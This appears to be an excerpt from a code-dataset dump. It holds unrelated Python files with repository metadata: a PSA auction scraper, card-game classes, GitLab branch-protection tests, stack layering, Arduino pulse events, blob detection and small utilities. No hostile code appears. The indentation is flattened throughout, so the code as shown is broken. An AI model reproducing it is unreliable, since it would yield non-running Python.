print("=== Significant results at P_THRESH_UNC = %f ===" % P_THRESH_UNC)
for (i0, labName) in enumerate(labRes["labels"]):
if labRes["tt_p"][i0] < P_THRESH_UNC:
mean_PFS = np.mean(labRes["meanFA"][i0]["PFS"])
mean_PWS = np.mean(labRes["meanFA"][i0]["PWS"])
ste_PFS = np.std(labRes["meanFA"][i0]["PFS"]) / \
np.sqrt(len(idxPFS))
ste_PWS = np.std(labRes["meanFA"][i0]["PWS"]) / \
np.sqrt(len(idxPWS))
print("WM label [%s]:" % labName)
print("\tPFS: mean = %f; SE = %f" % (mean_PFS, ste_PFS))
print("\tPWS: mean = %f; SE = %f" % (mean_PWS, ste_PWS))
print("\tt = %f; p = %f" % \
(labRes["tt_t"][i0], labRes["tt_p"][i0]))
| 32.108434 | 149 | 0.547842 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,650 | 0.309568 |
f1cbb897fe4f7aa594e93ad56844d2bed4a73d65
| 1,995 |
py
|
Python
|
Alt_DE/psacard/psa_card/code/loadall_auction_items.py
|
royadityak94/Interview
|
40a7f7e2edddbb525bc6b71ea72d6cd2bda5708f
|
[
"MIT"
] | null | null | null |
Alt_DE/psacard/psa_card/code/loadall_auction_items.py
|
royadityak94/Interview
|
40a7f7e2edddbb525bc6b71ea72d6cd2bda5708f
|
[
"MIT"
] | null | null | null |
Alt_DE/psacard/psa_card/code/loadall_auction_items.py
|
royadityak94/Interview
|
40a7f7e2edddbb525bc6b71ea72d6cd2bda5708f
|
[
"MIT"
] | null | null | null |
# Module to scrap all auction listings on the auction prices page
from selenium import webdriver
from bs4 import BeautifulSoup
import csv
import os
# Utility to write as .csv file format
def save_to_csv(data, SAVE_PATH, MODE):
if not os.path.exists(SAVE_PATH.split('/')[0]):
os.makedirs(SAVE_PATH.split('/')[0])
fileWriter = csv.DictWriter(open(SAVE_PATH, MODE), data[0].keys(), delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
fileWriter.writeheader()
fileWriter.writerows(data)
# Selenium Driver Handler
def load_driver(SELENIUM_EXECUTABLE_PATH=r'/mnt/c/Users/adity/Downloads/Chrome/geckodriver-v0.27.0-win64/geckodriver.exe'):
driver = webdriver.Firefox(executable_path=SELENIUM_EXECUTABLE_PATH)
return driver
# Main handler controlling all auction listing parsing
def fetch_auction_items(AUCTION_PRICES_PATH, BASE_PATH, SAVE_PATH, MODE):
driver = load_driver()
driver.get(AUCTION_PRICES_PATH)
soup=BeautifulSoup(driver.page_source, features="lxml")
auction_items = soup.find_all("table", attrs={"class": "auction-summary-results"})
auction_data = []
# Iteratiing over full-auction set
for item in auction_items:
item_info = {}
item_info['name'] = item.find('a').contents[0]
item_info['url'] = BASE_PATH + item.find('a')['href']
item_info['count'] = int(item.findAll('td')[-1].contents[0])
item_info['category'] = 'basketball_cards'
auction_data.append(item_info)
# Write to file
save_to_csv(auction_data, SAVE_PATH, MODE)
driver.quit()
return
# Entry-point of the progran
def main():
BASE_PATH='https://www.psacard.com'
AUCTION_PRICES_PATH=BASE_PATH + '/auctionprices/#2basketball%20cards%7Cbasketb'
SAVE_PATH='logs/allauctionprices.csv'
fetch_auction_items(AUCTION_PRICES_PATH, BASE_PATH, SAVE_PATH, 'w')
# Capability for stand-alone execution
if __name__ == '__main__':
main()
| 37.641509 | 128 | 0.700752 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 616 | 0.308772 |
f1cbcf01c46f003c5909284f4d2d85198beda10f
| 96 |
py
|
Python
|
venv/lib/python3.8/site-packages/numpy/typing/tests/data/pass/numerictypes.py
|
GiulianaPola/select_repeats
|
17a0d053d4f874e42cf654dd142168c2ec8fbd11
|
[
"MIT"
] | 2 |
2022-03-13T01:58:52.000Z
|
2022-03-31T06:07:54.000Z
|
venv/lib/python3.8/site-packages/numpy/typing/tests/data/pass/numerictypes.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | 19 |
2021-11-20T04:09:18.000Z
|
2022-03-23T15:05:55.000Z
|
venv/lib/python3.8/site-packages/numpy/typing/tests/data/pass/numerictypes.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | null | null | null |
/home/runner/.cache/pip/pool/7d/da/46/b543433b18dcfd975ecc18a25baa2105812baf0edc0bdbfae3890e1df2
| 96 | 96 | 0.895833 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
f1ccaa26614fd533c6b9140b49b0a5e2c602d313
| 3,343 |
py
|
Python
|
onirim/card/_location.py
|
cwahbong/onirim-py
|
d1110c4280d54e3b8b2d1dcef31ee433f32cb7e3
|
[
"MIT"
] | null | null | null |
onirim/card/_location.py
|
cwahbong/onirim-py
|
d1110c4280d54e3b8b2d1dcef31ee433f32cb7e3
|
[
"MIT"
] | null | null | null |
onirim/card/_location.py
|
cwahbong/onirim-py
|
d1110c4280d54e3b8b2d1dcef31ee433f32cb7e3
|
[
"MIT"
] | null | null | null |
"""Location cards."""
import logging
from onirim.card._base import ColorCard
from onirim import exception
from onirim import util
LOGGER = logging.getLogger(__name__)
class LocationKind(util.AutoNumberEnum):
"""
Enumerated kinds of locations.
Attributes:
sun
moon
key
"""
sun = ()
moon = ()
key = ()
def _can_obtain_door(content):
"""
Check if the explored cards can obtain a door.
"""
last_card = content.explored[-1]
same_count = 0
for card in reversed(content.explored):
if last_card.color == card.color:
same_count += 1
else:
break
return same_count % 3 == 0
class _Location(ColorCard):
"""Location card without special effect."""
def __init__(self, color, kind=None):
super().__init__(color)
if kind is not None:
self._kind = kind
def _class_name(self):
return "{} location".format(self._kind.name)
def _do_drawn(self, core):
core.content.hand.append(self)
def _do_play(self, core):
observer = core.observer
content = core.content
if content.explored and content.explored[-1].kind == self.kind:
raise exception.ConsecutiveSameKind
content.explored.append(self)
content.hand.remove(self)
if _can_obtain_door(content):
observer.on_door_obtained_by_explore(core.content)
color = content.explored[-1].color
card = content.piles.pull_door(color)
if card is not None:
content.opened.append(card)
if len(content.opened) == 8:
raise exception.Win
def _on_discard(self, core):
"""
Do additional operations after discard a card from hand to discarded
pile.
"""
pass
def _do_discard(self, core):
content = core.content
content.hand.remove(self)
content.piles.put_discard(self)
self._on_discard(core)
def sun(color):
"""
Make a sun location card with specific color.
Args:
color (Color): The specific color.
Returns:
Card: A sun location card.
"""
return _Location(color, LocationKind.sun)
def moon(color):
"""
Make a moon location card with specific color.
Args:
color (Color): The specific color.
Returns:
Card: A moon location card.
"""
return _Location(color, LocationKind.moon)
class _KeyLocation(_Location):
"""
Key location card implementation.
"""
_kind = LocationKind.key
def _on_discard(self, core):
actor = core.actor
content = core.content
drawn = content.piles.draw(5)
discarded_idx, back_idxes = actor.key_discard_react(core.content, drawn)
LOGGER.info(
"Agent choose key discard react %s, %s",
discarded_idx,
back_idxes)
# TODO check returned value
content.piles.put_discard(drawn[discarded_idx])
content.piles.put_undrawn_iter(drawn[idx] for idx in back_idxes)
def key(color):
"""
Make a key location card with specific color.
Args:
color (Color): The specific color.
Returns:
Card: A key location card.
"""
return _KeyLocation(color)
| 23.055172 | 80 | 0.606342 | 2,142 | 0.640742 | 0 | 0 | 0 | 0 | 0 | 0 | 954 | 0.285372 |
f1ccfab0d2faebbdb592b40f848ee1bf3127a09c
| 4,247 |
py
|
Python
|
gitlabform/gitlabform/test/test_branches.py
|
rbartuzel/gitlabform
|
4027ef4d6bbbef7313ed6fcf07cef8fd1ad76d18
|
[
"MIT"
] | null | null | null |
gitlabform/gitlabform/test/test_branches.py
|
rbartuzel/gitlabform
|
4027ef4d6bbbef7313ed6fcf07cef8fd1ad76d18
|
[
"MIT"
] | null | null | null |
gitlabform/gitlabform/test/test_branches.py
|
rbartuzel/gitlabform
|
4027ef4d6bbbef7313ed6fcf07cef8fd1ad76d18
|
[
"MIT"
] | null | null | null |
import pytest
from gitlabform.gitlabform import GitLabForm
from gitlabform.gitlabform.test import create_group, create_project_in_group, get_gitlab, create_readme_in_project, \
GROUP_NAME
PROJECT_NAME = 'branches_project'
GROUP_AND_PROJECT_NAME = GROUP_NAME + '/' + PROJECT_NAME
@pytest.fixture(scope="module")
def gitlab(request):
gl = get_gitlab()
create_group(GROUP_NAME)
create_project_in_group(GROUP_NAME, PROJECT_NAME)
create_readme_in_project(GROUP_AND_PROJECT_NAME) # in master branch
branches = ['protect_branch_but_allow_all', 'protect_branch_and_disallow_all',
'protect_branch_and_allow_merges', 'protect_branch_and_allow_pushes']
for branch in branches:
gl.create_branch(GROUP_AND_PROJECT_NAME, branch, 'master')
def fin():
# delete all created branches
for branch_to_delete in branches:
gl.delete_branch(GROUP_AND_PROJECT_NAME, branch_to_delete)
request.addfinalizer(fin)
return gl # provide fixture value
protect_branch_but_allow_all = """
gitlab:
api_version: 4
project_settings:
gitlabform_tests_group/branches_project:
branches:
protect_branch_but_allow_all:
protected: true
developers_can_push: true
developers_can_merge: true
"""
protect_branch_and_disallow_all = """
gitlab:
api_version: 4
project_settings:
gitlabform_tests_group/branches_project:
branches:
protect_branch_and_disallow_all:
protected: true
developers_can_push: false
developers_can_merge: false
"""
mixed_config = """
gitlab:
api_version: 4
project_settings:
gitlabform_tests_group/branches_project:
branches:
protect_branch_and_allow_merges:
protected: true
developers_can_push: false
developers_can_merge: true
protect_branch_and_allow_pushes:
protected: true
developers_can_push: true
developers_can_merge: false
"""
unprotect_branches = """
gitlab:
api_version: 4
project_settings:
gitlabform_tests_group/branches_project:
branches:
protect_branch_and_allow_merges:
protected: false
protect_branch_and_allow_pushes:
protected: false
"""
class TestBranches:
def test__protect_branch_but_allow_all(self, gitlab):
gf = GitLabForm(config_string=protect_branch_but_allow_all,
project_or_group=GROUP_AND_PROJECT_NAME)
gf.main()
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch_but_allow_all')
assert branch['protected'] is True
assert branch['developers_can_push'] is True
assert branch['developers_can_merge'] is True
def test__protect_branch_and_disallow_all(self, gitlab):
gf = GitLabForm(config_string=protect_branch_and_disallow_all,
project_or_group=GROUP_AND_PROJECT_NAME)
gf.main()
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch_and_disallow_all')
assert branch['protected'] is True
assert branch['developers_can_push'] is False
assert branch['developers_can_merge'] is False
def test__mixed_config(self, gitlab):
gf = GitLabForm(config_string=mixed_config,
project_or_group=GROUP_AND_PROJECT_NAME)
gf.main()
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch_and_allow_merges')
assert branch['protected'] is True
assert branch['developers_can_push'] is False
assert branch['developers_can_merge'] is True
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch_and_allow_pushes')
assert branch['protected'] is True
assert branch['developers_can_push'] is True
assert branch['developers_can_merge'] is False
gf = GitLabForm(config_string=unprotect_branches,
project_or_group=GROUP_AND_PROJECT_NAME)
gf.main()
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch_and_allow_merges')
assert branch['protected'] is False
branch = gitlab.get_branch(GROUP_AND_PROJECT_NAME, 'protect_branch_and_allow_pushes')
assert branch['protected'] is False
| 31.227941 | 117 | 0.721215 | 2,024 | 0.476572 | 0 | 0 | 733 | 0.172592 | 0 | 0 | 1,758 | 0.413939 |
f1cdf2cb5f5f7dc477b7b2cf95774b2b25e88788
| 2,543 |
py
|
Python
|
bespin/layers.py
|
delfick/bespin
|
4fa21875f0cdc32a70b33cdc90ce5196c0a2cbcd
|
[
"MIT"
] | 5 |
2017-04-05T00:46:41.000Z
|
2017-11-09T01:21:44.000Z
|
bespin/layers.py
|
delfick/bespin
|
4fa21875f0cdc32a70b33cdc90ce5196c0a2cbcd
|
[
"MIT"
] | 69 |
2016-10-11T04:40:09.000Z
|
2022-01-12T23:57:27.000Z
|
bespin/layers.py
|
delfick/bespin
|
4fa21875f0cdc32a70b33cdc90ce5196c0a2cbcd
|
[
"MIT"
] | 7 |
2016-10-11T04:32:21.000Z
|
2017-12-18T05:59:17.000Z
|
from bespin.errors import StackDepCycle
class Layers(object):
"""
Used to order the creation of many stacks.
Usage::
layers = Layers({"stack1": stack1, "stack2": "stack2, "stack3": stack3, "stack4": stack4})
layers.add_to_layers("stack3")
for layer in layers.layered:
# might get something like
# [("stack3", stack4), ("stack2", stack2)]
# [("stack3", stack3)]
When we create the layers, it will do a depth first addition of all dependencies
and only add a stack to a layer that occurs after all it's dependencies.
Cyclic dependencies will be complained about.
"""
def __init__(self, stacks, all_stacks=None):
self.stacks = stacks
self.all_stacks = all_stacks
if self.all_stacks is None:
self.all_stacks = stacks
self.accounted = {}
self._layered = []
def reset(self):
"""Make a clean slate (initialize layered and accounted on the instance)"""
self.accounted = {}
self._layered = []
@property
def layered(self):
"""Yield list of [[(name, stack), ...], [(name, stack), ...], ...]"""
result = []
for layer in self._layered:
nxt = []
for name in layer:
nxt.append((name, self.all_stacks[name]))
result.append(nxt)
return result
def add_all_to_layers(self):
"""Add all the stacks to layered"""
for stack in sorted(self.stacks):
self.add_to_layers(stack)
def add_to_layers(self, name, chain=None):
layered = self._layered
if name not in self.accounted:
self.accounted[name] = True
else:
return
if chain is None:
chain = []
chain = chain + [name]
for dependency in sorted(self.all_stacks[name].dependencies(self.all_stacks)):
dep_chain = list(chain)
if dependency in chain:
dep_chain.append(dependency)
raise StackDepCycle(chain=dep_chain)
self.add_to_layers(dependency, dep_chain)
layer = 0
for dependency in self.all_stacks[name].dependencies(self.all_stacks):
for index, deps in enumerate(layered):
if dependency in deps:
if layer <= index:
layer = index + 1
continue
if len(layered) == layer:
layered.append([])
layered[layer].append(name)
| 31.012195 | 98 | 0.563508 | 2,500 | 0.983091 | 0 | 0 | 329 | 0.129375 | 0 | 0 | 769 | 0.302399 |
f1ce356bd1c13f7cdfe09167b87b3a43fdb85c66
| 6,851 |
py
|
Python
|
src/pulsebox/events.py
|
rhosak/pulsebox
|
f2ce859ac5cd968bcd85a1e0eedf320414602a40
|
[
"MIT"
] | 3 |
2019-02-23T23:15:48.000Z
|
2020-03-23T12:33:15.000Z
|
src/pulsebox/events.py
|
rhosak/pulsebox
|
f2ce859ac5cd968bcd85a1e0eedf320414602a40
|
[
"MIT"
] | null | null | null |
src/pulsebox/events.py
|
rhosak/pulsebox
|
f2ce859ac5cd968bcd85a1e0eedf320414602a40
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""events.py
Pulse sequence events for the Arduino Due pulsebox.
Radim Hošák <hosak(at)optics.upol.cz>
2021 Quantum Optics Lab Olomouc
"""
from functools import reduce
from pulsebox.codeblocks import state_change, loop, channel_states_to_odsr
from pulsebox.config import calibration, pulsebox_pincount
class DelayEvent():
def __init__(self, time_string=None, iters=None,
duration=None, loop_suffix="0"):
if time_string:
duration = read_time(time_string)
iters = time2iters(duration)
elif duration:
iters = time2iters(duration)
elif iters:
duration = calibration * iters
codeblock = loop(iters, loop_suffix)
self.duration = duration
self.iters = iters
self.loop_suffix = loop_suffix
self.codeblock = codeblock
def from_time_string(self):
duration = read_time(time_string)
__init__(self, duration)
def __repr__(self):
return f"Delay: {self.duration} s " \
f"({self.iters} iters)"
class StateChangeEvent():
def __init__(self, channel_states):
odsr = channel_states_to_odsr(channel_states)
codeblock = state_change(odsr_value=odsr)
self.channel_states = channel_states
self.odsr = odsr
self.codeblock = codeblock
def __repr__(self):
# msg = "Pulsebox state change: \n"
msg = "State change: "
for channel, state in enumerate(self.channel_states):
msg += f"{state}"
if channel % 4 == 3 and (channel + 1) < pulsebox_pincount:
msg +="."
# msg += f"\tCH{channel}: {state}"
msg += f" ({self.odsr})"
return msg
class PulseEvent():
def __init__(self, channel, timestamp, duration):
self.channel = channel
self.timestamp = timestamp
self.duration = duration
self.flips = [FlipEvent(channel, timestamp=timestamp),
FlipEvent(channel, timestamp=(timestamp+duration))]
def __repr__(self):
return f"Pulse on channel {self.channel} - " \
f"start: {self.timestamp} s, duration: {self.duration} s"
class FlipEvent():
"""The fundamental channel flip event.
User pulse sequence input is transformed into a sequence
of pulsebox channel flips.
"""
def __init__(self, channel, time_string=None, timestamp=None):
if not timestamp:
if not time_string:
raise ValueError("Neither time string nor timestamp given.")
timestamp = read_time(time_string)
self.channel = channel
self.timestamp = timestamp
def __repr__(self):
return f"Channel {self.channel} flip at {self.timestamp} s"
def read_time(time_string):
"""Calculate time from a string containing a number and a time unit.
The unit is denoted by the last character of `time_string`. Time is
calculated by multiplying the 'number part' of `time_string` by a factor
corresponding to the unit.
The following units are accepted:
* n: nanoseconds (factor = 1e-9)
* u: microseconds (1e-6)
* m: milliseconds (1e-3)
* s: seconds (1)
* TODO: c: MCU clock cycles (12e-9)
* TODO: i: delay loop iterations (see `calibration` in config.ini)
Args:
* time_string (str): The (number + unit) string, for example "1m"
Returns:
* float time: Time (in seconds).
"""
factors = {
"n": 1e-9,
"u": 1e-6,
"m": 1e-3,
"s": 1
}
# Check that the time string is properly formatted, e. g. time part
# is followed by the unit part. The string should contain at least two
# character, otherwise splitting it into two parts will raise an IndexError.
try:
number, unit = time_string[:-1], time_string[-1]
except (IndexError, TypeError):
raise ValueError("Invalid time string given.")
# If the 'time part' cannot be converted to float, this raises a ValueError.
number = float(number)
if number < 0:
raise ValueError("Negative time values are not allowed.")
# Check that a valid time unit was specified. If no unit was specified,
# then what we call 'unit' will in fact be the last digit of the time value
# and as we do not use numeric unit symbols, we still get an error.
try:
factor = factors[unit]
except KeyError:
raise ValueError("Invalid time unit given.")
time = number * factor
return time
def time2iters(time):
"""Get the number of loop iterations required to achieve a given time delay.
Args:
* time (float): The time to convert to the number of delay loop iters.
Returns:
* int iters: The number of iterations through the ASM delay loop
required to produce a delay of a given length.
Notes:
The possible delay times are discrete, with a step given by the
structure of the ASM loop. This step is given by the `calibration`
variable in the config.
For example, if our delays for 1, 2, and 3 delay loop iterations are
50 ns, 100 ns, and 150 ns, respectively, and we want to convert
120 ns to delay loop iterations, we would see that 2.4 iterations are
required. As this is impossible, we round this to the nearest integer
amount of iterations. In this case, that's 2 iterations and instead of
120 ns delay we produced a 100 ns delay.
"""
if time < 0:
raise ValueError("Negative time is not allowed.")
iters = int(round(time / calibration))
return iters
def parse_events(event_string, channel=None):
"""Convert a long string of events into an array of event instances.
"""
event_substrings = event_string.split(" ")
events = []
for substring in event_substrings:
try:
event_type, event_params = substring[0], substring[1:]
except (IndexError, ValueError):
print(f"CH {channel} - Invalid event string: " \
f"{event_string.__repr__()}")
return events
if event_type.lower() == "p": # PulseEvent
# Pulse event contains two timestrings - start and duration.
# Separate them.
timestamp, duration = None, None
for n, ch in enumerate(event_params):
if ch.isalpha():
timestamp = read_time(event_params[:n+1])
duration = read_time(event_params[n+1:])
break
pe = PulseEvent(channel, timestamp, duration)
new_events = pe.flips
for event in new_events:
events.append(event)
return events
| 34.084577 | 80 | 0.618888 | 2,461 | 0.359113 | 0 | 0 | 0 | 0 | 0 | 0 | 3,218 | 0.469575 |
f1d17c8b8c557bcd6739e64fad4920995078f733
| 160 |
py
|
Python
|
7KYU/words_to_sentence.py
|
yaznasivasai/python_codewars
|
25493591dde4649dc9c1ec3bece8191a3bed6818
|
[
"MIT"
] | 4 |
2021-07-17T22:48:03.000Z
|
2022-03-25T14:10:58.000Z
|
7KYU/words_to_sentence.py
|
yaznasivasai/python_codewars
|
25493591dde4649dc9c1ec3bece8191a3bed6818
|
[
"MIT"
] | null | null | null |
7KYU/words_to_sentence.py
|
yaznasivasai/python_codewars
|
25493591dde4649dc9c1ec3bece8191a3bed6818
|
[
"MIT"
] | 3 |
2021-06-14T14:18:16.000Z
|
2022-03-16T06:02:02.000Z
|
def words_to_sentence(words: list) -> str:
""" This function create a string from a list of strings, separated by space. """
return ' '.join(words)
| 40 | 85 | 0.6625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 84 | 0.525 |
f1d2400def017bc7e08b7a2881ecb907828aa29c
| 1,839 |
py
|
Python
|
saber/postprocessing/blob_detect/blob_detect.py
|
elenimath/saber
|
71acab9798cf3aee1c4d64b09453e5234f8fdf1e
|
[
"Apache-2.0"
] | 12 |
2018-05-14T17:43:18.000Z
|
2021-11-16T04:03:33.000Z
|
saber/postprocessing/blob_detect/blob_detect.py
|
elenimath/saber
|
71acab9798cf3aee1c4d64b09453e5234f8fdf1e
|
[
"Apache-2.0"
] | 34 |
2019-05-06T19:13:36.000Z
|
2021-05-06T19:12:35.000Z
|
saber/postprocessing/blob_detect/blob_detect.py
|
elenimath/saber
|
71acab9798cf3aee1c4d64b09453e5234f8fdf1e
|
[
"Apache-2.0"
] | 3 |
2019-10-08T17:42:17.000Z
|
2021-07-28T05:52:02.000Z
|
# Copyright 2020 The Johns Hopkins University Applied Physics Laboratory
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
from skimage.measure import label, regionprops
import argparse
def get_parser():
parser = argparse.ArgumentParser(description="Blob Detect Tool")
parser.set_defaults(func=lambda _: parser.print_help())
parser.add_argument("-i", "--input", required=True, help="Input numpy array file")
parser.add_argument(
"--min", required=True, help="minimum area for region to be counted"
)
parser.add_argument(
"--max", required=True, help="maximum area for region to be counted"
)
parser.add_argument("-o", "--outfile", required=True, help="Output file")
return parser
def blob_detect(dense_map, min, max):
labels = label(dense_map)
regions = regionprops(labels)
output = np.empty((0, dense_map.ndim))
for props in regions:
if props.area >= float(min) and props.area <= float(max):
output = np.concatenate((output, [props.centroid]), axis=0)
return output
def main():
parser = get_parser()
args = parser.parse_args()
input_array = np.load(args.input)
output_array = blob_detect(input_array, min=args.min, max=args.max)
np.save(args.outfile, output_array)
if __name__ == "__main__":
main()
| 34.055556 | 86 | 0.707993 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 790 | 0.429581 |
f1d2cd28a494d8ac54d14b248cb64af3757ff63c
| 3,291 |
py
|
Python
|
tests/test_analyzer.py
|
kozajaku/spectra-analyzer
|
00de0d89fc4f210dca05249a2e823c6c49f3e917
|
[
"MIT"
] | null | null | null |
tests/test_analyzer.py
|
kozajaku/spectra-analyzer
|
00de0d89fc4f210dca05249a2e823c6c49f3e917
|
[
"MIT"
] | null | null | null |
tests/test_analyzer.py
|
kozajaku/spectra-analyzer
|
00de0d89fc4f210dca05249a2e823c6c49f3e917
|
[
"MIT"
] | null | null | null |
import pytest
import os
from tests import test_analyzer
from spectra_analyzer import analyzer
def file_ref(name):
"""Helper function for getting paths to testing spectra."""
file = os.path.join(os.path.dirname(test_analyzer.__file__),
"test_analyzer", name)
return file
def normalized(spectrum):
"""Test if passed spectrum is truly normalized."""
for i in range(spectrum.shape[0]):
if spectrum[i] < 0.0 or spectrum[i] > 1.0:
return False
return True
@pytest.fixture
def spectrum_inst():
"""Returns instance of Spectrum class for further testing."""
spectrum_file = file_ref("binary.vot")
return analyzer.Spectrum.read_spectrum(spectrum_file)
@pytest.mark.parametrize("file", ["binary.vot", "spectrum.asc", "spectrum.csv", "spectrum.fits",
"spectrum.fit", "spectrum.txt", "tabledata.vot"])
def test_fit_reader(file):
"""Test spectrum reader for individual spectra formats."""
spectrum_file = file_ref(file)
res = analyzer.Spectrum.read_spectrum(spectrum_file)
assert res is not None
assert normalized(res.spectrum)
def test_trans_parameters(spectrum_inst):
"""Test modification of transformation parameters inside spectrum instance."""
# test initial parameters
assert spectrum_inst.freq0 == 0
assert spectrum_inst.wSize == 5
scales = len(spectrum_inst.scales)
assert scales == 48 # set for the specific spectrum
mod = spectrum_inst.modify_parameters
mod(48, 0)
assert spectrum_inst.freq0 == 47
assert spectrum_inst.wSize == 0
mod(48, 10)
assert spectrum_inst.freq0 == 47
assert spectrum_inst.wSize == 0
mod(48, 1)
assert spectrum_inst.freq0 == 47
assert spectrum_inst.wSize == 0
mod(47, 1)
assert spectrum_inst.freq0 == 47
assert spectrum_inst.wSize == 0
mod(46, 2)
assert spectrum_inst.freq0 == 46
assert spectrum_inst.wSize == 1
mod(0, 48)
assert spectrum_inst.freq0 == 0
assert spectrum_inst.wSize == 47
mod(0, 47)
assert spectrum_inst.freq0 == 0
assert spectrum_inst.wSize == 47
mod(1, 47)
assert spectrum_inst.freq0 == 1
assert spectrum_inst.wSize == 46
def test_spectrum_plotting(spectrum_inst):
"""Test that spectrum plotting returns some output."""
plot = spectrum_inst.plot_spectrum()
assert type(plot) == str
assert len(plot) > 0
def test_cwt_plotting(spectrum_inst):
"""Test that cwt plotting returns some output."""
plot = spectrum_inst.plot_cwt()
assert type(plot) == str
assert len(plot) > 0
def test_transformation_plotting(spectrum_inst):
"""Test that transformation plotting returns some output."""
plot = spectrum_inst.plot_reduced_spectrum()
assert type(plot) == str
assert len(plot) > 0
plot = spectrum_inst.plot_reduced_spectrum(only_transformation=True)
assert type(plot) == str
assert len(plot) > 0
def test_rec_invalidation(spectrum_inst):
"""Test that _rec variable is properly invalidated after parameter modification."""
assert spectrum_inst._rec is None
spectrum_inst.plot_reduced_spectrum()
assert spectrum_inst._rec is not None
spectrum_inst.modify_parameters(5, 4)
assert spectrum_inst._rec is None
| 31.644231 | 96 | 0.696141 | 0 | 0 | 0 | 0 | 628 | 0.190823 | 0 | 0 | 739 | 0.224552 |
f1d3dc26cb6e1253349d57f3b6bf5b06931d5da6
| 774 |
py
|
Python
|
forms_app/views.py
|
sudee404/forms_project
|
ba60e41d13d72c80f412a7928e32000db200ea17
|
[
"Apache-2.0"
] | null | null | null |
forms_app/views.py
|
sudee404/forms_project
|
ba60e41d13d72c80f412a7928e32000db200ea17
|
[
"Apache-2.0"
] | null | null | null |
forms_app/views.py
|
sudee404/forms_project
|
ba60e41d13d72c80f412a7928e32000db200ea17
|
[
"Apache-2.0"
] | null | null | null |
from django.shortcuts import render
from .models import User
from . import forms
# Create your views here.
def index(request):
context = {
'django':'The Web Framework for Developers with a deadline'
}
return render(request,'index.html', context=context)
def signup(request):
sign_up = forms.UserForm()
if request.method == "POST":
sign_up = forms.UserForm(request.POST)
if sign_up.is_valid():
sign_up.save(commit=True)
return index(request)
data = {
'form':sign_up,
}
return render(request,'signup.html',context=data)
def userlist(request):
users = User.objects.order_by('name')
data = {
'users':users,
}
return render(request,'userlist.html',context = data)
| 26.689655 | 67 | 0.639535 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 148 | 0.191214 |
f1d3eb9d9dab05a31381c38ed24576dd96752996
| 920 |
py
|
Python
|
python_submitty_utils/tests/test_string_utils.py
|
zeez2030/Submitty
|
7118944ff4adc6f15d76984eb10a1e862926d724
|
[
"BSD-3-Clause"
] | 411 |
2016-06-14T20:52:25.000Z
|
2022-03-31T21:20:25.000Z
|
python_submitty_utils/tests/test_string_utils.py
|
KaelanWillauer/Submitty
|
cf9b6ceda15ec0a661e2ca81ea7864790094c64a
|
[
"BSD-3-Clause"
] | 5,730 |
2016-05-23T21:04:32.000Z
|
2022-03-31T10:08:06.000Z
|
python_submitty_utils/tests/test_string_utils.py
|
KaelanWillauer/Submitty
|
cf9b6ceda15ec0a661e2ca81ea7864790094c64a
|
[
"BSD-3-Clause"
] | 423 |
2016-09-22T21:11:30.000Z
|
2022-03-29T18:55:28.000Z
|
import unittest
from submitty_utils import string_utils
class TestUser(unittest.TestCase):
def testNegativeLength(self):
self.assertEqual(string_utils.generate_random_string(-1), '')
def testZeroLength(self):
self.assertEqual(string_utils.generate_random_string(0), '')
def testPositiveLength(self):
self.assertEqual(len(string_utils.generate_random_string(1)), 1)
def testRandom(self):
# Very low chance of generating the same string twice.
for _ in range(10):
self.assertNotEqual(string_utils.generate_random_string(10), string_utils.generate_random_string(10))
self.assertNotEqual(string_utils.generate_random_string(100), string_utils.generate_random_string(100))
self.assertNotEqual(string_utils.generate_random_string(1000), string_utils.generate_random_string(1000))
if __name__ == '__main__':
unittest.main()
| 36.8 | 117 | 0.742391 | 812 | 0.882609 | 0 | 0 | 0 | 0 | 0 | 0 | 68 | 0.073913 |
f1d87b5f62ca7da3adff2398d764af03ea29ed10
| 486 |
py
|
Python
|
simple/file.py
|
asafonov/simple-backup
|
4e90162cb10219537da42c57d49f8f2409ba7148
|
[
"MIT"
] | null | null | null |
simple/file.py
|
asafonov/simple-backup
|
4e90162cb10219537da42c57d49f8f2409ba7148
|
[
"MIT"
] | null | null | null |
simple/file.py
|
asafonov/simple-backup
|
4e90162cb10219537da42c57d49f8f2409ba7148
|
[
"MIT"
] | null | null | null |
import os
class FileHandler:
def __init__(self):
self.directory = os.path.expanduser('~') + '/.simple_backup'
if not os.path.exists(self.directory):
os.mkdir(self.directory)
def save (self, filename, data):
f = open(self.directory + '/' + filename, 'w')
f.write(data)
f.close()
def load (self, filename):
f = open(self.directory + '/' + filename)
data = f.read()
f.close()
return data
| 23.142857 | 68 | 0.549383 | 474 | 0.975309 | 0 | 0 | 0 | 0 | 0 | 0 | 29 | 0.059671 |
f1d9fe63dcda29a6aafbbbb348278fbcaa1eb8c3
| 3,449 |
py
|
Python
|
metrics.py
|
mksarker/data_preprocessing
|
dabdb7f3dbf1c4bf5ee49a39aef2cb258539b027
|
[
"MIT"
] | null | null | null |
metrics.py
|
mksarker/data_preprocessing
|
dabdb7f3dbf1c4bf5ee49a39aef2cb258539b027
|
[
"MIT"
] | null | null | null |
metrics.py
|
mksarker/data_preprocessing
|
dabdb7f3dbf1c4bf5ee49a39aef2cb258539b027
|
[
"MIT"
